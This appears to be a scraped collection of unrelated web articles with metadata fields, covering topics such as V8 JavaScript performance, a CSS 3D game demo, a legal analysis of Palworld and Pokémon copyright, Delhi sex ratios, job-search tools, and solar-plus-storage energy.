I enjoyed Dan Olson‘s talk on Lean Product Management for Web 2.0 Products at web 2.0 Expo earlier this year. His recent slide deck includes a section on What is Product Management, as well as covering subjects a such as Product-Market fit, value proposition, usability, the pivot, and continuous improvement together with a case study.
In continuing the Essential Startup series I appreciate any tips on killer startup decks, tools and ideas.
**Did you like this post? **Please, feel free to subscribe or follow me on Twitter.
Hey Tor – thanks for the reference!
I have a newer version of the Product / Market Fit deck on Slideshare, based on a lot of feedback I received (including yours):
The New Rules Of Early Stage Product DevelopmentfromRishi DeanThe corresponding blogpost is forthcoming, and will let you know when I post.
Thanks again!
Rishi
http://rishidean.com
Hi Rishi,
I really enjoy reading these slides. Good progress 🙂
Talking “pre-chasm”, to what extent to you see that the first chasm between innovators and early adopters (the one before the main chasm) aligns with achieving product-market fit?
I am looking forward to the post.
Cheers, Tor
Pingback: Today’s Startup and Entrepreneurial Updates
Pingback: Today’s Startup and Entrepreneurial Updates | atomicgate.com
| true | true | true |
Planning versus execution often makes a dilemma to startup founders. So instead of reading a pile of books on the subject you might as well getting started with some killer ideas at hand. Recently …
|
2024-10-12 00:00:00
|
2010-06-29 00:00:00
|
article
|
wordpress.com
|
The Methodologist
| null | null |
|
14,104,724 |
https://blog.chromium.org/2017/04/real-world-javascript-performance.html
|
Real-world JavaScript performance
|
Google
|
The V8 JavaScript engine is a cornerstone of fast browsing in Chrome. Over the course of the past year, the V8 team has developed a new method for measuring performance against snapshots of real web pages. Using insights from real-world measurements, the V8 team improved the speed of the average page load in Chrome by 10-20% over the course of the past year.
Historically, JavaScript engines such as V8 used benchmarks like Octane to improve the “peak” performance of JavaScript, or the performance of CPU-intensive script in hot loops. At the beginning of last year, the V8 team started to measure performance with higher fidelity by instrumenting snapshots of popular web pages such as Reddit, Twitter, Facebook, and Wikipedia. This analysis revealed that while peak performance benefits certain types of large web applications, browsing typical websites relies more on “startup” performance, or the speed it takes to start running script. Using insights gleaned from this real-world performance data, the V8 team implemented optimizations which improved mean page load between Chrome 49 and Chrome 56 by 10-20%, depending on CPU architecture.
The web page snapshots also enabled analysis of the differences between various benchmarks and real web workloads. Although no benchmark can be a representative proxy for all sites, the Speedometer benchmark is an approximation of many sites due to its inclusion of real web frameworks including React, Angular, Ember, and jQuery. This similarity can be seen in the startup optimizations above, which also yielded a 25-35% improvement in Chrome’s Speedometer score. Conversely, comparing page snapshots to Octane revealed that Octane was a poor approximation of most websites. Given the plateau of Octane scores across web browsers and the over-optimization of peak performance, we decided to retire the benchmark as a general-purpose measure of real-world JavaScript performance.
V8 performance optimizations improved Chrome's Speedometer score by 25-35% over the past year
Going forward, we plan to ship more JavaScript performance improvements for new patterns of script appearing on the web, including modern libraries, frameworks, and ES2015+ language features. By measuring real-world websites rather than traditional benchmarks, we can better optimize JavaScript patterns that matter most to users and developers. Stay tuned for updates about our new engine architecture, designed for real-world performance.
Posted by Seth Thompson, V8 Track Commentator
| true | true | true |
The V8 JavaScript engine is a cornerstone of fast browsing in Chrome. Over the course of the past year, the V8 team has developed a new me...
|
2024-10-12 00:00:00
|
2017-04-12 00:00:00
|
https://lh3.googleusercontent.com/jKkzIw-KViX-5TzyXy64YhJ6hR1wR71g9XuDX-2uI7IoTT9lnkAJvUdm04TA0BafidGZMu6uGANzSyiGrcqmfQ2NteMXOGo5oZZffcQDosGhf4N3ivWNfyjQrmU9Ls4SMVhcp_eN=w1200-h630-p-k-no-nu
|
article
|
chromium.org
|
Chromium Blog
| null | null |
27,073,515 |
https://github.com/beclamide/gta-css
|
GitHub - beclamide/gta-css: I made a Grand Theft Auto style demo in CSS 3D (as much as possible) because I'm an idiot with far too much free time.
|
Beclamide
|
Play the demo here: https://rainbow-dolphin-0e2aae.netlify.app
I made this demo just to see how powerful CSS 3D actually is, and I got a bit carried away...
I was also curious to see how good CSS is for making computer games.
I wanted to try to keep as much of the visual stuff within CSS as possible and use JS only for game logic.
Clone the repo locally.
This was built with Node 10.13. If you're using NVM make sure you run `nvm use`
before installing.
```
$ npm install
$ npm run serve
```
Open a browser and go to `http://localhost:8080`
Action | Keys |
---|---|
Accelerate | Up Arrow |
Brake | Down Arrow |
Steer Left/Right | Left/Right Arrows |
There are now mobile controls too!
I've added a slide deck that goes along with my talk (video link to be added later). They explain some of the process and development of the demo.
Open a browser and go to `http://localhost:8080/slides.html`
| true | true | true |
I made a Grand Theft Auto style demo in CSS 3D (as much as possible) because I'm an idiot with far too much free time. - beclamide/gta-css
|
2024-10-12 00:00:00
|
2021-03-22 00:00:00
|
https://repository-images.githubusercontent.com/350397553/d7d18d80-8b3e-11eb-9e42-c227da7c439d
|
object
|
github.com
|
GitHub
| null | null |
25,975,284 |
https://twitter.com/Wisdom1Original
|
x.com
| null | null | true | true | false | null |
2024-10-12 00:00:00
| null | null | null | null |
X (formerly Twitter)
| null | null |
39,165,049 |
https://www.technollama.co.uk/palworld-pokemon-and-copyright-infringement
|
Palworld, Pokémon, and copyright infringement
| null |
A game called Palworld is taking the world by storm. This title has garnered 8 million downloads on Steam in less than 6 days, it also has become the second game in Steam history to hit over 2 million concurrent players. The game is a monster-collection-base-defence-crafting mash-up, you catch creatures (named Pals) to either fight or work for you collecting materials to build items and your base, they also help you defeat other Pals with guns, or weaken them enough so that you can capture them. Everyone who plays the game seems to love it, and I’ve heard from people who’ve played it that it’s delightfully bonkers and addictive. Not my cup of tea, but I may try it after I get through Baldur’s Gate 3 (yes, I’m late to that particular party).
So players love it, and it’s selling like hotcakes, so why am I writing about it? Well, if you’re on certain corners of Twitter, your opinion of the game would be quite negative. It started with accusations of the game depicting slavery and animal cruelty (the capture and killing bit), then it got accused of using artificial intelligence to generate Pals, and then it got attacked for blatantly stealing character designs and assets from Pokémon. Agreement quickly grew on the perennially angry and outraged cesspit that is Twitter that Palworld was not good, and should be boycotted.
And yet the game continues to thrive regardless, it’s almost as if Twitter’s opinion doesn’t count, but I digress.
I can’t comment on the accusations of animal cruelty other than to point out that people should learn to distinguish between games and reality. The claims regarding AI appear to be entirely related to previous activities from developers (one of them likes AI, gasp!), and have nothing to do with the actual game, which started being developed 3 years ago, well before the current generative AI boom. There’s a pernicious tendency on Twitter to denounce anything that has even a hint of AI even without evidence, but facts never stopped a good witch-hunt. What has interested me the most have been the claims that Palworld is potentially engaged in copyright infringement. So, is it?
Right from the start, there is clearly a common element in both games, Pokémon is a game where you capture creatures using pokéballs and get them to fight for you against other trainers in a turn-based system. In Palworld there is indeed a creature-capture mechanic that uses a ball as a device, but that’s where all gameplay similarities end, the creatures fight with guns, and they also have other practical uses, you can give them instructions to perform tasks for you, and you can also use others as means of transportation.
What has raised more questions have been some of the Pals, there are now several articles that compare Pals and Pokémon, and there cannot be any doubt that there are quite a few that look very similar, although others share a passing resemblance in some elements (links here and here). The similarity is enough to continue fuelling the controversy, with people calling for Nintendo to sue Pocket Pair, the game’s developer. So, is this copyright infringement?
It depends. Yes, I know this is a lawyerly cop-out, but in this case it may quite fitting. There are quite a few things to remember here. The first is that when it comes to computer games, there’s quite a lot of copying of concepts already, you can find games that are pretty much clones of others, and the amount of cross-pollination in some genres is considerable. There’s almost never direct copying of code, so any infringement suit already has to contend with an industry that is keen on borrowing ideas from other property. And I use the word “idea” here on purpose, copyright does not protect an idea, it protects the expression of that idea, so you cannot protect the idea of first person shooters, or even the idea of monster-catching games. The second consideration is the gameplay itself, which in this case is very different, so Nintendo wouldn’t have a claim on that side, I can’t see the capture element being subject to protection alone (too much idea), and anyway Pokémon did not invent that concept, that honour goes to the 80s game Megami Tensei. And even some of the Pokémon are inspired by Japanese myths and culture, as well as having borrowed heavily from character design from games such as Dragon Quest. However, it is the character design of the Pals where Pokémon could have a stronger copyright infringement claim. The legal question will rest on just how similar are the designs, and if they cross the line into substantial similarity, it’s not only necessary that there is a resemblance between two characters, but that similarity has to be substantial.
This will be a matter for a court to decide, I can definitely see some similarities, but this will depend a lot on expert witnesses. I have seen a few threads and speculation that Palworld may have directly copied digital assets from Pokémon games, this would definitely be a considerable boost for a potential Nintendo lawsuit if proven true. I will not even begin to assess those claims, I am entirely unqualified to do so, but current speculation is futile until this gets to court, if it ever does.
Why would Nintendo not initiate legal action? I think that a suit is possible, but unlikely. Here are my reasons in a convenient bullet-point format:
- Most Twitter commentary has been based on speculation and a complete misunderstanding of copyright law, so it can be ignored entirely, the only opinion that matters is Nintendo’s.
- Palworld is not infringing trademarks, none of the Pals share a name with their Pokémon counterparts (fun fact, only the most famous Pokémon are protected by trademarks), so this will rest entirely on character copyright, which may be more difficult to prove.
- Not all Pals are similar to Pokémon, and there is a varying degree of similarity, making the case less of a slam dunk one, and more likely to be either settled or negotiated (more on that later).
- Forum matters. Most of the legal commentary has been centred on the United States, which is common online, but still drives me up the wall. Pokémon is an IP owned jointly by three Japanese companies, Creature, Game Freak, and Nintendo. Pocket Pair, the Palworld developer, is also a Japanese company. So why would they sue in US courts when all of the parties are Japanese? One could argue that Palworld is distributed by Valve (the makers of the gaming platform Steam), which is a US company, but unless Nintendo plans on also suing Valve (which makes no sense), then I just cannot see this happening. Moreover, suing anywhere else could open the suit to be dismissed under the forum non conveniens doctrine.
- Pokémon has a history of borrowing characters and concepts from earlier games, so initiating a lawsuit could shine a light on the argument that some Pokémon lack originality themselves, or that they are just generic versions of existing animals: pigeons, birds, foxes, cats, fiery lizards…
- Palworld has been in development for three years, with trailers dating back as far as two years ago. Nintendo should have seen this coming, and could have stopped it before release. Why didn’t they? Could it be that their lawyers aren’t 100% sure of success?
**Edit:**Could there be a parody exception here? It would be interesting to know how Japanese law handles parodies in copyright.
So should Nintendo sit this one out? I don’t think so. Pokémon is one of the most valuable media empires in the world, and having a game that is practically being advertised by people as “Pokémon with guns” could tarnish their reputation. But then again, it may not, Pokémon will remain a strong IP regardless of what happens with Palworld. My guess is that copyright litigation is not the way to go here, why not negotiate some sort of licensing agreement with Palworld behind the scenes? Why not even embrace the new direction presented by this game? Nintendo could become a partner, and allow Pokémon to actually exist in Palworld. I would actually start playing Palworld if I could take Pikachu on a hunting expedition with guns. Give me a playable Flareon with a flame thrower. Please take my money!
**Concluding**
So I don’t think that anyone should be rushing to defend Nintendo on social media, they’re more than capable of taking a decision of whether or not to sue the makers of Palworld on their own. But one thing has become clear to me, Twitter’s capacity to generate angry mobs continues unabated, but it’s evident that these are powerless when it comes to the real world. Consumers are not on Twitter, and if the game is fun, they will buy it.
I’ll leave you as I’m off to buy Baldur’s Gate 3, what should I play, a sorcerer or a wizard? Decisions, decisions.
**Edit:** I’ve been watching quite a lot of gameplay on Youtube, and I’m increasingly convinced that Nintendo will have a difficult time in an infringement suit, the game is so much more than a Pokémon clone, I can see why it’s so addictive.
**Edit September 2024:** So Nintendo has sued Pocket Pair, not for copyright, but patent infringement. Looks like software patents are back on the menu, boys.
## 34 Comments
## Anonymous · January 28, 2024 at 8:58 pm
I’m afraid that could be the case in the future if similatrieies go to the point of “(Pal) looks, not joking, exactly in design like (Pokemon), No differences at all!”
## Anonymous · January 29, 2024 at 12:16 am
None of the pal world characters look nothing alike and that’s coming from someone who has played all of the Pokemon games has 10k pokemon cards as well why can’t people just play the damn game and enjoy it stop complaining about it just enjoy it
## Anonymous · January 29, 2024 at 11:08 am
Nintendo would have sued straight away if any laws were being broken they are not idiots they have pricey lawyers
## Anonymous · February 1, 2024 at 2:13 pm
Nah they knew about it since 3 yrs ago they just dont have enough evidence to win the lawsuit
## Anonymous · January 29, 2024 at 12:50 pm
Google pal world cobalion.
## Anonymous · February 5, 2024 at 3:08 am
They might be similar but they aren’t copies and most of the similar ones are based of common animals like wolves, foxes, and sheep so the lawsuit prob won’t do anything
## Anonymous · February 1, 2024 at 2:15 pm
I dont think u played pokemon enough you should return everything. I clearly see the sprites and skeletons being close to pokemon and ive been playing pokemon ever since the original red and blue version
## Anonymous · March 1, 2024 at 9:21 pm
Hmm I agree have been playing pokemon since pokemon lets go sun and moon game
## Anonymous · February 4, 2024 at 9:37 pm
the pokemon (cobalion) tell me it doesnt look the same as in pokemon if you say no then it must be yugioh or digimon you have played all games of and the cards must be dual masters or something
## Anonymous · February 10, 2024 at 8:52 pm
Some of them do. This just proves you haven’t played one of them. The characters are copied from Pokemon. These are facts
## Just Me · January 29, 2024 at 2:01 am
You normally do not file for copyright until after the product is released. Why sue a company with a little bit of money when you can sue a company that made money off of copyrighting your content. I am not saying they do have a winning argument I am just stating any attorney would tell you to wait until product is release so it doesn’t disappear and also so there is more money to be made from law suit.
## Anonymous · February 1, 2024 at 2:20 pm
I think hes right about ppl misunderstanding what lawsuits mean. You arent supposed to wait for the infringer to make money to pay the lawsuit as whatever amount will be decided upon court decision. Also its an idea like patent infringement i think nintendo lawyers didnt have enough evidence to go after them and have 100% win rate. Dunno why they would start now based on twitter forums.
## Anonymous · February 4, 2024 at 10:02 pm
with copyright you sue the soon as possible, why because if you let time pass you are giving the impresion you dont care about your product
## Anonymous · January 29, 2024 at 8:22 pm
Warlock
## Andres Guadamuz · January 30, 2024 at 12:42 pm
Created a sorcerer first.
## Anonymous · January 31, 2024 at 4:32 pm
Best call ngl, a good Warlock buddy is Wyll tho
## Alex · January 30, 2024 at 4:00 pm
My guess is what will happen:
Nintendo will punk check them with a lawsuit threat.
Palsworld will respond with update where they fix the likeness of characters in question
Case will be dropped
Honestly I wouldn’t be surprised if they make a partnership like they did with Pokémon Go. In the end they both want to make money, a partnership would just skyrocket their profits.
I’m all for sticking it to large corporations. But these laws are in place to protect large and small businesses. Because essentially based on everyone’s logic I could make my own subway. Call it subdown, change a couple menu items a little bit, and change the colors of the logo. Emotion because you like the game doesn’t mean you should disregard laws put in place.
Ali thought I would love to see animals file a class action lawsuit against Pokémon.
## Anonymous · February 1, 2024 at 2:23 pm
Or they could make them not look like pokemon. They knew their customers wanted pokemon and obviously they did it on purpose. Any idiot can see its a different colored eevee..
## Anonymous · February 2, 2024 at 1:49 pm
This dumb dribble is not even purposeful. You are telling me with the 1000+Pokémon there are that nobody can ever make an animated creature capture game ever. Your dumb.
## Anonymous · February 7, 2024 at 11:39 am
You’re
## Anonymous · January 31, 2024 at 5:48 pm
pokemon but with guns hehe
## Anonymous · February 1, 2024 at 2:26 pm
In the original pokemon manga they always had guns, even the original animation team rocket jesse and james had rockets but funimation started censoring and changing everything to make it kid friendly. If you also play the pokemon games it has pokedex info saying pokemon eat kids, people eat pokemon etc.
## Anonymous · February 1, 2024 at 2:52 pm
Does anyone have a list of the copyrighted pokemon, everywhere else I read says that all the pokemon are trademarked
## Anonymous · February 7, 2024 at 11:41 am
Truth is Nintendo are salty they could never make a game like Pal due to their obsession with keeping things kid friendly..
## Anonymous · March 17, 2024 at 4:23 pm
Not to mention that they’re mad someone did a better job than them at something they think they have a monopoly over.
## Anonymous · February 12, 2024 at 12:25 am
All I got from this is that the author hates twitter. Cheap shots every other sentence. Were you a victim of the culling when ownership changed? Moving on.
## Anonymous · March 1, 2024 at 9:23 pm
don’t get me wrong i love plaworld its a great game im also a big pokemon fan there both great games honestly think Nintendo should not use palworld
## Anonymous · February 1, 2024 at 2:30 pm
Tem Tem, nexomon, and all the other pokemon clones had the same pokeball system but the difference between them and palworld is they used different sprites that dont look like pokemon. Nintendo should ask for a fee to borrow from them but i dont think it stole the branding
## Anonymous · February 14, 2024 at 6:19 pm
Nintendo and the Pokémon Company would have to tread lightly if they went the “it looks similar in design to Pokémon” route. It could easily backfire on them since there are Pokémon designs that are practically copies from creatures of other series.
## Palworld, Pokémon, and copyright infringement - TechnoLlama - Pokémon News · January 28, 2024 at 6:06 pm
[…] Right from the start, there is clearly a common element in both games, Pokémon is a game where you capture creatures using pokéballs and get them to …View full source […]
## 幻獸帕魯、寶可夢及著作權侵權 – 智潮集 · January 31, 2024 at 8:19 am
[…] 原文連結:Palworld, Pokémon, and copyright nfringement […]
## PR in Action #3 – MKTG214 – Spencer Moore MKTG214 Blog · February 2, 2024 at 8:45 pm
[…] Palworld, Pokémon, and copyright infringement […]
## Pokémon vs Palworld: Parody or Plagiarism? – Game Researcher · February 11, 2024 at 10:25 pm
[…] Nintendo itself has commented on the game, with some people hoping that they would sue the game for copyright infringement. It seems unlikely that that will happen though, as the game was announced a couple years ago, and […]
## Copyright Clash: PalWorld, Pokémon, And The Gaming Industry · February 17, 2024 at 4:27 pm
[…] Legal issues surrounding PalWorld and Pokémon […]
| true | true | true |
A game called Palworld is taking the world by storm. This title has garnered 8 million downloads on Steam in less than 6 days, it also has become the second game in Steam history to hit over 2 mill…
|
2024-10-12 00:00:00
|
2024-01-27 00:00:00
|
article
|
technollama.co.uk
|
TechnoLlama
| null | null |
|
13,860,154 |
https://stanfy.com/blog/facebook-messenger-bots-interactions/
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
5,020,652 |
http://shkspr.mobi/blog/2013/01/sex-ratios-in-delhi/
|
Sex Ratios in Delhi
|
· Statistics ·
|
# Sex Ratios in Delhi
There are no words to adequately describe the horrific rape and murder of Jyoti Singh Pandey.
I remember, several years ago reading a short piece of speculative fiction which postulated that China would go to war over access to women. Generations of female infanticide would leave the country with a severe gender imbalance. Hoards of men would be unable to find a wife, would become violent, and would lead their country into bitter conflicts with other countries in order to capture their women.
A simplistic approach, perhaps. There are many perceived consequences of an unchecked male population growth. But gender imbalance stemming from female infanticide is a real problem around the world.
The Indian Census has released some very detailed statistics for the country's population. This chart shows the male:female ratio in Dehli.
Now, there are several reasons why there may be fewer women than men in Delhi. Economic migration may play a part for example. What we can look at with some accuracy is the birth rate.
In most human societies, more boys are born than girls. In 2011, the global sex ratio was 984 females per 1,000 males.
In India, the rate is 940.
In Delhi? It's 866.
In *rural* Delhi? 809.
Delhi has 1.2 million more men than women.
By way of comparison, In the UK as a whole there are 970 males to every 1,000 females (according to the ONS mid-2007 population estimates). Of course, the UK doesn't have an exemplary record when it comes to sex crimes.
There are many factors to the continued female harassment around the world. I don't want to appear to be an apologist for sexual violence, or single this out as the sole cause for these shameful crimes. However, I can't help but wonder whether populations with such unhealthy sex ratios provide an environment which fosters a truly terrible attitude to women.
## Niblettes says:
There are historical precedents for the problems inherent in demographic gender imbalance. The Chinese call these extra men bare branches. There is a really good article here (it's a PDF):
http://www.hcs.harvard.edu/~hapr/winter07_gov/hudson.pdf
| true | true | true |
There are no words to adequately describe the horrific rape and murder of Jyoti Singh Pandey. I remember, several years ago reading a short piece of speculative fiction which postulated that China would go to war over access to women. Generations of female infanticide would leave the country with a severe gender imbalance. Hoards of […]
|
2024-10-12 00:00:00
|
2013-01-07 00:00:00
|
article
|
shkspr.mobi
|
Terence Eden’s Blog
| null | null |
|
13,967,051 |
https://www.nytimes.com/2017/03/19/technology/lawyers-artificial-intelligence.html
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
9,765,030 |
http://insights.dice.com/2015/06/23/handy-tools-for-streamlining-your-job-search/
|
Handy Tools for Streamlining Your Job Search
|
Leslie Stevens-Huffman
|
Job hunting can be so time-consuming, it’s practically a full-time job unto itself. To do it right, you need to promote your brand, research companies, customize resumes and stay on top of your contacts and activity. Fortunately, there are plenty of Web tools, plugins and mobile apps to streamline the process. Here are a few that make job hunting easier and faster:
### Resume Optimizers
Do you waste time applying for jobs that aren’t a good fit? Does your resume have a knack for disappearing into black holes? Using online tools such as
Jobscan or
Resunate can alleviate at least some of those problems. Jobscan uses an applicant tracking system (ATS) algorithm to rank the match between your resume’s content and a job posting, explained James Hu, the firm’s co-founder and CEO. If your resume receives a low score, you can either modify its contents to get past the ATS or choose to pursue a more suitable position. “Jobscan cuts the time needed for resume tailoring in half because you can see at a glance the keywords or job titles you need to add or change,” he said. You can save even more time by using
Pocket Resume or
Resume Maker On-the-Go to change out your resume’s keywords right from your mobile device.
### Organizers
Following up after you submit your resume can set you apart from the competition. Whether you prefer browser extenders, mobile apps or Web tools, there’s always a handy implement to jog your memory and keep tabs on your activity.
44score is a browser extender that keeps track of applications and other paperwork, and reminds you when it’s time to follow up.
JibberJobber and
jobaware offer similar functionality (as well as online and mobile versions). Other options include
Startwire, which claims to be America’s number one job-search organizer, and
JobHero, which integrates with most major job boards including Dice. If you’re looking for a mobile solution, check out
GoodWire. Of course, you can adapt almost any CRM tool to manage your activity. Hu recommends
Streak, a Gmail plugin that lets you track resume submittals, phone screens and interviews right from your inbox.
### Brand Builders
If pounding the digital pavement seems fruitless, why not make it easy for employers and recruiters to find you? Having a strong online presence elevates your brand and catches the eye of recruiters who look for candidates on the Internet. However, unless you happen to be a Web developer, building a personal website or portfolio from scratch can prove a daunting endeavor. With
branded.me, you can create a personal website optimized for tablets and phones; you can also connect or set up a customized domain name and email address. Getting started is easy—simply transfer the information from your online profile. “Branded.me provides analytics so you can see how often your site is coming up in searches and who’s viewing your site,” said Hannah Morgan, a job search and career guide based in Rochester, N.Y. “And because the information is highly sharable, having a personal website or portfolio extends your brand’s reach.” Morgan also recommends
Spiceworks, a portfolio builder that caters to the needs of tech professionals, but there are dozens of tools to choose from that offer similar turnkey packages.
### Hidden Job Finders
Applying to jobs advertised on
Dice and employers’ websites is an integral component of a comprehensive search strategy, but some positions go to opportunistic candidates before they’re publicized. How do you deal with such conundrums?
Hidden Jobs tracks and reports hiring and expansion announcements from newspapers, online media and company press releases; acting on those tips and information can help you get the jump on the competition.
### Research Tools
Whether you’re trying to find the name of an elusive hiring manager or prepping for an interview or salary negotiation, these tools can simplify and accelerate the research process:
- Craft is a free, open information platform that provides data on dynamic sectors, companies, teams, people and open positions.
- ZoomInfo provides information on people and companies.
- AnnualReports provides annual reports in one single location.
- Job Search Intelligence compiles salary data and compensation from 130 million workers.
- Salary Expert provides salaries, benefits and cost-of-living information.
- Interview Simulator Pro lets you record answers to interview questions and critique your performance on your mobile device.
Good luck!
| true | true | true |
Here are some web tools, plugins and mobile apps for streamlining the job-search process.
|
2024-10-12 00:00:00
|
2015-06-23 00:00:00
|
Article
|
dice.com
|
Dice
| null | null |
|
37,470,863 |
https://www.reuters.com/technology/space/germany-launch-massive-expansion-ev-charging-network-says-scholz-2023-09-05/
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
5,039,884 |
http://techcrunch.com/2013/01/10/lytro-reveals-its-software-side-at-ces-video/
|
Lytro Reveals Its Software Side At CES [Video] | TechCrunch
|
Jordan Crook
|
If you haven’t yet experienced the world of light field photography, it’s time to step into the Lytro. (See what I did there?)
The Lytro camera is a brand new form of photographic technology that produces what the company calls a “living photo.” This means that the user has the ability to change the focus from the foreground to background, shift perspective, and add cool color filters to the photos. But this is only the beginning.
What truly makes Lytro unique isn’t the hardware — though the camera itself is undeniably innovative. The most interesting thing about Lytro is that it’s almost more of a software company than a hardware business.
With this new form of technology that captures not only the plane of light, but the direction of the light, there is a *ton* of data to mine out of each photo.
This means that the possibilities are endless, since Lytro simply has to adjust the software to introduce new features. We spoke with Eric Cheng, Director of Photography at Lytro, who hinted that there’s plenty more in store for Lytro users. And the beauty is that it all comes to you over software updates — no hardware upgrades required.
| true | true | true |
If you haven't yet experienced the world of light field photography, it's time to step into the Lytro. (See what I did there?) The Lytro camera is a brand new form of photographic technology that produces what the company calls a "living photo." This means that the user has the ability to change the focus from the foreground to background, shift perspective, and add cool color filters to the photos. But this is only the beginning.
|
2024-10-12 00:00:00
|
2013-01-10 00:00:00
|
article
|
techcrunch.com
|
TechCrunch
| null | null |
|
36,435,569 |
https://www.forbes.com/sites/paultassi/2023/06/21/artists-are-mad-about-marvels-secret-invasion-ai-generated-opening-credits/
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
21,428,450 |
https://sivers.org/pinit2
|
Podcast published today
| null |
# Podcast published today
2019-10-29Starting today you can follow my podcast at sive.rs/podcast.rss or listen on the web at sive.rs/podcast.
Each episode is around two minutes long. They are my posts since September 22nd. 33 episodes so far.
I generated the RSS XML feed myself using this Ruby script. The MP3s are just hosted on my own server. I skipped all the podcast hosting services, because I’ll never have ads so I don’t care about analytics, tracking, and all of that.
It doesn’t cost me anything, so I won’t be trying to make money from it. I’m doing it just because people keep asking me to. ☺
This is all an experiment. Please let me know if you have any suggestions.
| true | true | true | null |
2024-10-12 00:00:00
|
2019-10-29 00:00:00
| null | null | null | null | null | null |
2,362,898 |
http://leaverou.me/2011/02/incrementable-length-values-in-text-fields/
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
18,896,876 |
https://qz.com/1521660/solar-and-batteries-are-retiring-natural-gas-plants/
|
Solar plus batteries aim to retire natural gas plants in 2019
|
Michael J Coren
|
For years, proponents of natural gas referred to it as a “bridge fuel,” an interim power source on the way to a distant future dominated by renewable energy. That far-off day seemed to pose little immediate threat. Not anymore.
Last year, representatives at the World Gas Conference started referring to natural gas as a “destination fuel” instead, even as one US state after another halted plans for natural gas plants.
The nervousness stems from the plummeting prices of solar panels and battery storage. Natural gas plants are the historical go-to choice for “peaker plants,” which provide electricity during times of highest demand. While rarely used (just a few days per year on average), they’re critical to preventing blackouts.
Now, solar project developers are moving into that territory. Solar developers are bidding prices for new electricity capacity lower than natural gas plants even after adding batteries. In December, Credit Suisse confirmed that utility-scale solar-plus-storage was already cheaper than gas peaker plants in many cases.
After years in the doldrums, US energy-storage installations, mostly lithium-ion batteries, are taking off, having risen 57% to 338 MW in 2018 over the previous year, according to estimates by Wood Mackenzie Power & Renewables. Globally, 6 gigawatt-hours have been installed worldwide.
GE and Siemens have been trying to offload their natural gas turbine businesses as sales tumble. In May 2018, GE cut its sales forecast for its heavy-duty natural gas power plant business by more than half, saying demand would stay at the reduced level through 2020.
| true | true | true |
Natural gas plants are dimming faster than expected.
|
2024-10-12 00:00:00
|
2019-01-11 00:00:00
|
article
|
qz.com
|
Quartz
| null | null |
|
21,704,526 |
https://medium.com/@AnorakVC/why-i-invested-in-zerotier-d459d967c072
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
16,227,206 |
https://www.wired.com/story/tencent-software-beats-go-champ-showing-chinas-ai-gains/?mbid=social_fb_onsiteshare
|
Tencent Software Beats Go Champ, Showing China's AI Gains
|
Tom Simonite
|
In March 2016, Alphabet’s DeepMind research group set a milestone in artificial intelligence when its AlphaGo program defeated professional Go player Lee Sedol, then fifth-ranked in the world, at the complex board game Go.
Now China’s Tencent is claiming a milestone of its own in Go—and China’s ambitions in artificial intelligence. Last week, the company’s Fine Art program defeated China’s top professional Ke Jie, despite giving him a significant head start. Ke recently slipped to number two in the world, after holding the top spot for three years.
Fine Art’s victory won notice in the world of Go because it helps illustrate the gulf that has opened between human and machine players of the complex boardgame.
But it also highlights a shrinking gulf---between AI capabilities in the US and China. In a detailed national strategy for AI released last summer, China set a goal of drawing level with America by 2020, and pulling ahead by 2030. Central, state, and municipal governments are directing money towards AI research and companies.
Tencent, whose offerings span from messaging to payments and music, was named to a “national team” for AI by China’s Ministry of Science and Technology in November, alongside four other tech giants. Greg Allen, an adjunct fellow at the Center for a New American Security, says the company’s Go program shows the US should take China’s technological ambitions seriously. “Fine Art is yet more proof of the stunning progress China has made in AI technology,” he says.
China’s big AI push was partly spurred by AlphaGo’s victory in 2016. Professors who advised the Chinese government on the AI plan told the *New York Times* that Alphabet’s achievement was a “Sputnik moment” in which officials realized they lagged the US in a technology with broad commercial and military applications.
Go was invented in China more than 3,000 years ago, and is still viewed as an important part of Chinese cultural heritage. Players take turns placing stones on a 19-by-19 grid in a battle for territory that is many times more complex than chess.
Handicaps are used to level the playing field between people of different skill levels. Tencent’s Fine Art defeated Ke Jie despite giving the one-time world champion a two-stone head start. That suggests the program is in a different league than the best humans, not just slightly better.
Ingo Althöfer, a math professor and Go expert at Friedrich Schiller University of Jena in Germany, says that it has generally been held that a perfect “Go God” could beat the best human with a three-stone handicap. “Fine Art is trying to reach this limit of perfect play,” he says. Althöfer calls Ke Jie “likely the best human player currently.” DeepMind has so far ignored calls for AlphaGo to play handicapped games in public, Althöfer says.
Alphabet’s use of the game to demonstrate the might of its AI muscle rankled some Chinese officials. Google took AlphaGo to China for a “Future of Go Summit” last summer, with the main event a match in which the software defeated Ke Jie. Chinese state television reversed plans to cover the match shortly before it began, and local internet providers blocked Chinese-language broadcasts half an hour after the match started.
Tencent created Fine Art in 2016, and has previously said the software has beaten several professionals, including Ke Jie. The company says the latest, upgraded version played a series of handicapped games against professionals starting on Jan. 9. The match against the 20-year-old Ke Jie on Jan. 17 was the capstone. Fine Art still isn’t perfect, though. The International Go Federation reports that Fine Art played 34 games against professionals given a two-stone handicap, and won 30.
Those results, like China’s rapid advance in AI, came with an assist from Alphabet and other US companies. Tencent says the latest version of Fine Art drew inspiration from a paper by DeepMind last year about an improved version of AlphaGo called AlphaGo Zero. Alphabet, Microsoft, Facebook, and many other US companies have helped stoke the worldwide uptick of interest in AI by publishing research papers and releasing software packages.
Althöfer is now hoping Tencent and Alphabet will agree to the ultimate Go showdown: Fine Art versus AlphaGo.
- Some US politicians argue restricting Chinese investments would slow the country's advances in AI—it wouldn't work.
- China's roads will open to self-driving vehicles before America's do, says Chinese search engine Baidu.
- Government officials suppressed coverage of Alphabet's software AlphaGo defeating China's top Go player, Ke Jie last summer.
| true | true | true |
China is making a national push in artificial intelligence. A program from one of its biggest internet companies, Tencent, just beat a world champion at Go.
|
2024-10-12 00:00:00
|
2018-01-23 00:00:00
|
article
|
wired.com
|
WIRED
| null | null |
|
28,554,388 |
https://www.youtube.com/watch?v=8xAvVfJ_xyI
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
14,302,288 |
http://sciencebulletin.org/archives/12855.html
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
24,475,449 |
https://www.nytimes.com/2020/09/09/upshot/coronavirus-surprise-test-fees.html
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
2,517,974 |
http://www.edge.org/documents/archive/edge342.html
